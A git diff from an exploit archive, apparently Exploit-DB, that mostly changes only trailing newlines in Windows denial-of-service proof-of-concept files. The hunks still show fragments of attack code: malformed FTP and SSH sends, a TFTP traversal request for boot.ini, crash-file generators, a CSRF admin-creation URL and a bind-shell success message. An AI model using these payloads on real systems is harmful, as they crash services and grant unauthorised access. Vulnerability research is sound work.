--- a/platforms/windows/dos/35622.txt +++ b/platforms/windows/dos/35622.txt @@ -228,7 +228,4 @@ is trademark of vulnerability-lab team & the specific authors or managers. To re VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com -PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt - - - +PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt \ No newline at end of file diff --git a/platforms/windows/dos/35654.py b/platforms/windows/dos/35654.py index f113207eb..7b2cfa3c5 100755 --- a/platforms/windows/dos/35654.py +++ b/platforms/windows/dos/35654.py @@ -34,5 +34,4 @@ addr = (host,port)1 data ='\x00\x01\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x62\x6f\x6f' +\ '\x74\x2e\x69\x6e\x69\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00' -s.sendto(data, (host, port)) - +s.sendto(data, (host, port)) \ No newline at end of file diff --git a/platforms/windows/dos/35656.pl b/platforms/windows/dos/35656.pl index 48e83ce8f..2c5352a66 100755 --- a/platforms/windows/dos/35656.pl +++ b/platforms/windows/dos/35656.pl @@ -42,5 +42,4 @@ my $PoC = "\x4b\x45\x44\x41\x4e\x53"; # NULL Heap PoC open (FILE,">> KedAns.pj"); # Bad File Here print FILE $PoC; close (FILE); -# KedAns-Dz | [D] HaCkerS-StreeT-Team [Z] |!| http://twitter.com/kedans - +# KedAns-Dz | [D] HaCkerS-StreeT-Team [Z] |!| http://twitter.com/kedans \ No newline at end of file diff --git a/platforms/windows/dos/357.c b/platforms/windows/dos/357.c index 890db2dff..cd7556d42 100755 --- a/platforms/windows/dos/357.c +++ b/platforms/windows/dos/357.c @@ -383,4 +383,4 @@ void std_err(void) { exit(1); } -// milw0rm.com [2004-07-20] +// milw0rm.com [2004-07-20] \ No newline at end of file diff --git a/platforms/windows/dos/35869.txt b/platforms/windows/dos/35869.txt index fb0afb2c8..07e9b15a4 100755 --- a/platforms/windows/dos/35869.txt +++ b/platforms/windows/dos/35869.txt @@ -111,4 +111,4 @@ The security risk of the vulnerability is estimated as medium because of the loc Authors: ================== -Kapil Soni (Haxinos) +Kapil Soni (Haxinos) \ No newline at end of file diff --git a/platforms/windows/dos/35876.html b/platforms/windows/dos/35876.html index 9ef143b5e..a8a053c2e 100755 --- a/platforms/windows/dos/35876.html +++ b/platforms/windows/dos/35876.html @@ -98,5 +98,4 @@ function Do_it() <input language=JavaScript onclick=Do_it() type=button value="Click here To Test"><br> </body> -</HTML> - +</HTML> \ No newline at end of file diff --git a/platforms/windows/dos/35889.py b/platforms/windows/dos/35889.py index b5c266a5b..ba1dcd458 100755 --- a/platforms/windows/dos/35889.py +++ b/platforms/windows/dos/35889.py @@ -93,4 +93,4 @@ print "File Successfully Created [1]" #Author: #======= -#Kapil Soni (Haxinos) +#Kapil Soni (Haxinos) \ No newline at end of file diff --git a/platforms/windows/dos/35935.py b/platforms/windows/dos/35935.py index a735e35bc..036f66e75 100755 --- a/platforms/windows/dos/35935.py +++ b/platforms/windows/dos/35935.py @@ -43,4 +43,4 @@ file.close() print "UniPDF v1.1 Crash PoC by bonze at FPT-IS" print "Email: dungvtr@gmail.com" -print "File Created" +print "File Created" \ No newline at end of file diff --git a/platforms/windows/dos/3602.py b/platforms/windows/dos/3602.py index 94c5f7e7e..aa6a4bd1a 100755 --- a/platforms/windows/dos/3602.py +++ b/platforms/windows/dos/3602.py @@ -57,4 +57,4 @@ if __name__=="__main__": ExploitLotus(target) -# milw0rm.com [2007-03-29] +# milw0rm.com [2007-03-29] \ No newline at end of file diff --git a/platforms/windows/dos/36071.py b/platforms/windows/dos/36071.py index a29425f80..55124ab19 100755 --- a/platforms/windows/dos/36071.py +++ b/platforms/windows/dos/36071.py @@ -72,4 +72,4 @@ sock.recv(1024) sock.close() print "[+] Exploit succeed. Now NetCat %s on port 4444\n" %(sys.argv[1]) print "\n > Exploit By : KedAns-Dz - Dz Offenders Cr3w - Inj3ct0r Team" -sys.exit() +sys.exit() \ No newline at end of file diff --git a/platforms/windows/dos/36092.pl b/platforms/windows/dos/36092.pl index 8a3f012a8..26db97f1c 100755 --- a/platforms/windows/dos/36092.pl +++ b/platforms/windows/dos/36092.pl @@ -24,4 +24,4 @@ my $junk= "\x64\x39\x39\x79\x2e\x63\x6f\x6d" x 1000 ; open(d99y,">$file"); print d99y $junk ; close(d99y); -print "\n [ # ] Vulnerable File Created !\n" +print "\n [ # ] Vulnerable File Created !\n" \ No newline at end of file diff --git a/platforms/windows/dos/362.sh b/platforms/windows/dos/362.sh index f849417b1..5ef508b5c 100755 --- a/platforms/windows/dos/362.sh +++ b/platforms/windows/dos/362.sh @@ -9,4 +9,4 @@ echo.>>http.tmp nc -w 10 %1 %PORT% < http.tmp del http.tmp -# milw0rm.com [2004-07-22] +# milw0rm.com [2004-07-22] \ No newline at end of file diff --git a/platforms/windows/dos/36260.txt b/platforms/windows/dos/36260.txt index 2655e6bd9..0c8b42620 100755 --- a/platforms/windows/dos/36260.txt +++ b/platforms/windows/dos/36260.txt @@ -55,4 +55,4 @@ Opera Web Browser 11.52 is vulnerable; other versions may also be affected. \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+ \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+ \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+ - \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r/); </script> + \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r/); </script> \ No newline at end of file diff --git a/platforms/windows/dos/36285.c b/platforms/windows/dos/36285.c index 313fd11dc..c0352daa8 100755 --- a/platforms/windows/dos/36285.c +++ b/platforms/windows/dos/36285.c @@ -119,4 +119,4 @@ while \`true\`;do /sbin/ping -c 1 \$1;done EOF chmod +x ping.sh gcc winnuke2011.c -o winnuke2011 -./winnuke2011 +./winnuke2011 \ No newline at end of file diff --git a/platforms/windows/dos/36300.py b/platforms/windows/dos/36300.py index ce3d1bc0c..9f4cc9a05 100755 --- a/platforms/windows/dos/36300.py +++ b/platforms/windows/dos/36300.py @@ -42,7 +42,4 @@ try: f.write(ogg) f.close() except: - print('\nError while creating ogg file\n') - - - + print('\nError while creating ogg file\n') \ No newline at end of file diff --git a/platforms/windows/dos/36335.txt b/platforms/windows/dos/36335.txt index 7bf1b1c4c..448250423 100755 --- a/platforms/windows/dos/36335.txt +++ b/platforms/windows/dos/36335.txt @@ -65,4 +65,4 @@ An error when handling the Size member of a GIF DataSubBlock data structure can http://protekresearchlab.com/exploits/PRL-2015-02.gif https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36335.gif -############################################################################### +############################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/36336.txt b/platforms/windows/dos/36336.txt index 519c8183b..cd12e2e1f 100755 --- a/platforms/windows/dos/36336.txt +++ b/platforms/windows/dos/36336.txt @@ -70,4 +70,4 @@ http://protekresearchlab.com/exploits/PRL-2015-03.rar https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36336.rar ############################################################################### -Search for: +Search for: \ No newline at end of file diff --git a/platforms/windows/dos/36361.py b/platforms/windows/dos/36361.py index e5a33ac80..c1a36c81c 100755 --- a/platforms/windows/dos/36361.py +++ b/platforms/windows/dos/36361.py @@ -84,4 +84,4 @@ else: username=sys.argv[2] passwd=sys.argv[3] start(hostname,username,passwd) - sys.exit(0) + sys.exit(0) \ No newline at end of file diff --git a/platforms/windows/dos/36422.txt b/platforms/windows/dos/36422.txt index 19efdf688..db93561ff 100755 --- a/platforms/windows/dos/36422.txt +++ b/platforms/windows/dos/36422.txt @@ -143,4 +143,4 @@ The contents of this advisory are copyright (c) 2014 Core Security and (c) 2014 13. PGP/GPG Keys -This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. +This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. \ No newline at end of file diff --git a/platforms/windows/dos/365.html b/platforms/windows/dos/365.html index 02e73cb99..32a78cb87 100755 --- a/platforms/windows/dos/365.html +++ b/platforms/windows/dos/365.html @@ -1,3 +1,3 @@ <STYLE>@;/* -// milw0rm.com [2004-07-23] +// milw0rm.com [2004-07-23] \ No newline at end of file diff --git a/platforms/windows/dos/366.pl b/platforms/windows/dos/366.pl index a162da41f..79ae122f7 100755 --- a/platforms/windows/dos/366.pl +++ b/platforms/windows/dos/366.pl @@ -65,4 +65,4 @@ return $l; # End code ############################# -# milw0rm.com [2004-07-24] +# milw0rm.com [2004-07-24] \ No newline at end of file diff --git a/platforms/windows/dos/3674.pl b/platforms/windows/dos/3674.pl index 35dde9e15..6f18a2bc3 100755 --- a/platforms/windows/dos/3674.pl +++ b/platforms/windows/dos/3674.pl @@ -43,4 +43,4 @@ print $res->as_string; # UniquE(at)UniquE-Key.Org # http://www.UniquE-Key.Org -# milw0rm.com [2007-04-05] +# milw0rm.com [2007-04-05] \ No newline at end of file diff --git a/platforms/windows/dos/36783.txt b/platforms/windows/dos/36783.txt index e929e71a3..ebbcba425 100755 --- a/platforms/windows/dos/36783.txt +++ b/platforms/windows/dos/36783.txt @@ -90,4 +90,4 @@ C:\Oracle\SmartView\bin\HsAddin.dll FileDescription: Oracle� Hyperion Smart View for Office, Fusion Edition LegalCopyright: Copyright 2004, 2013 Oracle Corporation. All rights reserved - LegalTrademarks: Oracle� is registered. + LegalTrademarks: Oracle� is registered. \ No newline at end of file diff --git a/platforms/windows/dos/36788.txt b/platforms/windows/dos/36788.txt index c7d1c8070..d4fb72c6a 100755 --- a/platforms/windows/dos/36788.txt +++ b/platforms/windows/dos/36788.txt @@ -64,4 +64,4 @@ Successful exploitation may allow execution of arbitrary code. =========== http://protekresearchlab.com/exploits/PRL-2015-04.docx -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36788.docx +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36788.docx \ No newline at end of file diff --git a/platforms/windows/dos/3684.c b/platforms/windows/dos/3684.c index 24a0a0e70..cb8b13c6a 100755 --- a/platforms/windows/dos/3684.c +++ b/platforms/windows/dos/3684.c @@ -51,4 +51,4 @@ int main(int argc, char* argv[]) } -// milw0rm.com [2007-04-08] +// milw0rm.com [2007-04-08] \ No newline at end of file diff --git a/platforms/windows/dos/36841.py b/platforms/windows/dos/36841.py index c3c32b3d6..ec1e84c03 100755 --- a/platforms/windows/dos/36841.py +++ b/platforms/windows/dos/36841.py @@ -27,7 +27,4 @@ print "POC Created By -Acid" print " acid.exploit@gmail.com" file = open("update.xml","w") file.write(crash) -file.close() - - - +file.close() \ No newline at end of file diff --git a/platforms/windows/dos/36847.py b/platforms/windows/dos/36847.py index d2969ade0..68bca4b4a 100755 --- a/platforms/windows/dos/36847.py +++ b/platforms/windows/dos/36847.py @@ -19,4 +19,4 @@ f = open(file, "w") f.write(buffer) -f.close() +f.close() \ No newline at end of file diff --git a/platforms/windows/dos/3690.txt b/platforms/windows/dos/3690.txt index d0b2b02c4..7da8c0e14 100755 --- a/platforms/windows/dos/3690.txt +++ b/platforms/windows/dos/3690.txt @@ -36,4 +36,4 @@ Be safe, Muts -# milw0rm.com [2007-04-09] +# milw0rm.com [2007-04-09] \ No newline at end of file diff --git a/platforms/windows/dos/3693.txt b/platforms/windows/dos/3693.txt index 656751d3e..e2133f82c 100755 --- a/platforms/windows/dos/3693.txt +++ b/platforms/windows/dos/3693.txt @@ -2,4 +2,4 @@ MS Windows .HLP File Local HEAP Overflow PoC 0day https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3693.hlp.tgz (04092007-evil1.hlp.tgz) -# milw0rm.com [2007-04-09] +# milw0rm.com [2007-04-09] \ No newline at end of file diff --git a/platforms/windows/dos/36969.txt b/platforms/windows/dos/36969.txt index 2c056cf63..aa1f112da 100755 --- a/platforms/windows/dos/36969.txt +++ b/platforms/windows/dos/36969.txt @@ -9,5 +9,4 @@ Citrix Licensing 11.6.1 build 10007 is vulnerable; other versions may also be af Proof-of-Concept: http://www.example.com/users?licenseTab=&selected=&userName=xsrf&firstName=xsrf&lastName=xsrf&password2=xsrf&confirm=xsrf&accountType=admin&originalAccountType=&Create=Save(Administrator CSRF) -http://www.example.com/dashboard?<something long here>=2 (pre auth DoS, crashes lmadmin.exe) - +http://www.example.com/dashboard?<something long here>=2 (pre auth DoS, crashes lmadmin.exe) \ No newline at end of file diff --git a/platforms/windows/dos/36972.py b/platforms/windows/dos/36972.py index 6df7a5db4..093349632 100755 --- a/platforms/windows/dos/36972.py +++ b/platforms/windows/dos/36972.py @@ -24,4 +24,4 @@ s.send('PASS anonymous' + '\r\n') data = s.recv(1024) s.send('APPE ' + buffer + '\r\n') print '\n\t[*] Done! Target should be unresponsive!' -s.close() +s.close() \ No newline at end of file diff --git a/platforms/windows/dos/37014.py b/platforms/windows/dos/37014.py index 5ed7e2f49..afdf980c0 100755 --- a/platforms/windows/dos/37014.py +++ b/platforms/windows/dos/37014.py @@ -22,4 +22,4 @@ f = open(file, "w") f.write(buffer) -f.close() +f.close() \ No newline at end of file diff --git a/platforms/windows/dos/37149.py b/platforms/windows/dos/37149.py index 032f855d9..c4de0481b 100755 --- a/platforms/windows/dos/37149.py +++ b/platforms/windows/dos/37149.py @@ -22,4 +22,4 @@ soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) soc.bind(('127.0.0.1', 22)) soc.listen(1) client, addr = soc.accept() -client.send('SSH-2.0-SUCK') ## no "\r\n" lead to crash +client.send('SSH-2.0-SUCK') ## no "\r\n" lead to crash \ No newline at end of file diff --git a/platforms/windows/dos/3715.py b/platforms/windows/dos/3715.py index 0cd37c622..c3dfee50b 100755 --- a/platforms/windows/dos/3715.py +++ b/platforms/windows/dos/3715.py @@ -22,4 +22,4 @@ try: except: print "Unable to connect. exiting." -# milw0rm.com [2007-04-12] +# milw0rm.com [2007-04-12] \ No newline at end of file diff --git a/platforms/windows/dos/37160.pl b/platforms/windows/dos/37160.pl index 345654fb3..6fd908675 100755 --- a/platforms/windows/dos/37160.pl +++ b/platforms/windows/dos/37160.pl @@ -13,5 +13,4 @@ open(TESTFILE, ">$filename.epub"); sleep(3); close(TESTFILE); print "------Complete!------\n"; -exit(1); - +exit(1); \ No newline at end of file diff --git a/platforms/windows/dos/37188.txt b/platforms/windows/dos/37188.txt index 214a082e4..8eedf1301 100755 --- a/platforms/windows/dos/37188.txt +++ b/platforms/windows/dos/37188.txt @@ -268,6 +268,4 @@ is trademark of vulnerability-lab team & the specific authors or managers. To re VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com -PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt - - +PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt \ No newline at end of file diff --git a/platforms/windows/dos/37286.py b/platforms/windows/dos/37286.py index 25c23cee3..5d96ec4b3 100755 --- a/platforms/windows/dos/37286.py +++ b/platforms/windows/dos/37286.py @@ -67,5 +67,4 @@ dh_gex_reply_msg += '\x21' ## dh gex reply dh_gex_reply_msg += '\x00\x00\xff\xff' ## dh host key len dh_gex_reply_msg += 'A'*600 -client.sendall(dh_gex_reply_msg) - +client.sendall(dh_gex_reply_msg) \ No newline at end of file diff --git a/platforms/windows/dos/37291.py b/platforms/windows/dos/37291.py index dd96a585d..e60721cac 100755 --- a/platforms/windows/dos/37291.py +++ b/platforms/windows/dos/37291.py @@ -66,5 +66,4 @@ dh_gex_reply_msg += '\x21' ## dh gex reply dh_gex_reply_msg += '\x00\x00\xff\xff' ## dh host key len dh_gex_reply_msg += 'A'*600 -client.sendall(dh_gex_reply_msg) - +client.sendall(dh_gex_reply_msg) \ No newline at end of file diff --git a/platforms/windows/dos/37299.py b/platforms/windows/dos/37299.py index 0578ef0fe..0415e1975 100755 --- a/platforms/windows/dos/37299.py +++ b/platforms/windows/dos/37299.py @@ -40,4 +40,4 @@ filename = "crash.wav" file = open(filename , "w") file.write(crash) print "\n Files Created!\n" -file.close() +file.close() \ No newline at end of file diff --git a/platforms/windows/dos/37300.py b/platforms/windows/dos/37300.py index 2d2344cf1..c6c59931a 100755 --- a/platforms/windows/dos/37300.py +++ b/platforms/windows/dos/37300.py @@ -41,4 +41,4 @@ filename = "crash.mp4" file = open(filename , "w") file.write(crash) print "\n Files Created!\n" -file.close() +file.close() \ No newline at end of file diff --git a/platforms/windows/dos/37326.py b/platforms/windows/dos/37326.py index 52a5725d6..8154abfb4 100755 --- a/platforms/windows/dos/37326.py +++ b/platforms/windows/dos/37326.py @@ -29,4 +29,4 @@ exploit += "\x41" * 900000 crash = open('crash.wav','w') crash.write(exploit) -crash.close() +crash.close() \ No newline at end of file diff --git a/platforms/windows/dos/37327.py b/platforms/windows/dos/37327.py index 34cb972be..6b6d5e039 100755 --- a/platforms/windows/dos/37327.py +++ b/platforms/windows/dos/37327.py @@ -29,4 +29,4 @@ exploit += "\x41" * 900000 crash = open('crash.wav','w') crash.write(exploit) -crash.close() +crash.close() \ No newline at end of file diff --git a/platforms/windows/dos/37343.py b/platforms/windows/dos/37343.py index 136027ff4..c32b5fadb 100755 --- a/platforms/windows/dos/37343.py +++ b/platforms/windows/dos/37343.py @@ -46,4 +46,4 @@ s.send(buffer) print '[!] Malformed request sent\n' -s.close() +s.close() \ No newline at end of file diff --git a/platforms/windows/dos/37456.html b/platforms/windows/dos/37456.html index ac3a0c2b3..9f2bdf744 100755 --- a/platforms/windows/dos/37456.html +++ b/platforms/windows/dos/37456.html @@ -97,4 +97,4 @@ NPMcFFPlg32!CreateFFScriptable+0x141: </script> </body> -</html> +</html> \ No newline at end of file diff --git a/platforms/windows/dos/37458.pl b/platforms/windows/dos/37458.pl index c0d439665..ebba3da69 100755 --- a/platforms/windows/dos/37458.pl +++ b/platforms/windows/dos/37458.pl @@ -12,4 +12,4 @@ my $file = "dark.m3u"; my $cr = "4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 